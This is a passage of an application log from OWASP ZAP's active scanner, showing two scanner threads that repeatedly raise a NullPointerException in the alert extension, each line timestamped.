org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13337443 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13337645 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13337646 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13337844 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13337848 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13338539 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13338540 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13338742 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13338742 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13338942 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13338943 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13339140 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13339146 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13339346 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13339348 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13339547 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13339547 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13339748 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13339748 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13339949 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13339949 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13340157 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13340157 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13340348 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13340349 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13340551 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13340552 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13340753 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13340754 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13340955 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13340956 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13341156 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13341157 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13341357 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13341357 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13341558 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13341558 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13341758 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13341758 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13341960 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13341961 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13342162 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13342162 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13342363 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13342364 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13342565 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13342565 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13342765 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13342768 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13343451 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13343462 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13343570 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13343771 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13343772 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13343973 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13343973 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13344174 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13344174 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13344375 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13344375 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13344576 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13344576 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13344775 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13344776 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13344978 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13344978 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13345178 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13345178 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13345379 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13345379 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13345579 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13345580 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13345780 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13345781 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13345981 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13345983 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13346181 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13346182 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13346384 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13346384 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13346583 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13346584 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13346786 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13346786 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13346985 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13346987 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13347187 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13347187 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13347387 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13347387 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13347588 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13347588 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13347790 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13347988 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13348216 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13349051 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13349055 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13349261 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13349662 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13349662 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13349864 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13349864 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13350065 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13350263 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13350464 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13350664 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13350665 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13350865 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13351065 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13351275 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13351467 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13351467 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13351668 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13352270 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13352672 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13353073 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13354078 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13354682 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13355285 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13355492 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13355689 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13355689 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13355886 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13355886 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13356087 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13356087 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13356287 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13356287 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13356488 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13356489 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13356689 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13356689 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13356889 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13356891 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13357091 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13357091 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13357959 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13357961 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13358092 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13358093 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13358293 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13358294 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13358493 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13358494 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13358694 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13358695 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13358896 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13358896 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13359097 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13359097 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13359297 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13359297 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13359497 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13359498 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13359698 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13359698 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13359899 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13359899 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13360100 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13360100 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13360303 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13360303 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13360703 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13360703 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13361422 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13361422 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13361504 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13361705 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13361906 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13362106 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13362106 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13362307 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13362708 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13362708 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13362909 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13362909 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13363110 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13363511 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13363512 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13363712 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13363712 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13363913 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13364515 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13364916 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13365318 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13366922 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13367724 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13368327 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13368539 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13368730 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13368730 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13368930 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13368932 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13369131 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13369131 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13369332 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13369332 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13369532 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13369532 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13369733 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13369733 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13369935 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13369935 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13370135 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13370135 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13370336 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13370336 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13370537 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13370537 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13370737 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13370737 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13370938 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13370938 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13371139 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13371141 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13371340 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13371341 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13371540 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13371540 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13371742 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13371742 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13371942 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13371942 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13372143 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13372143 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13372346 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13372346 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13372551 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13372551 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13372746 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13372747 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13372949 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13373146 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13373345 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13373346 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13373548 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13373949 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13373949 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13374713 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13374715 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13374761 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13375161 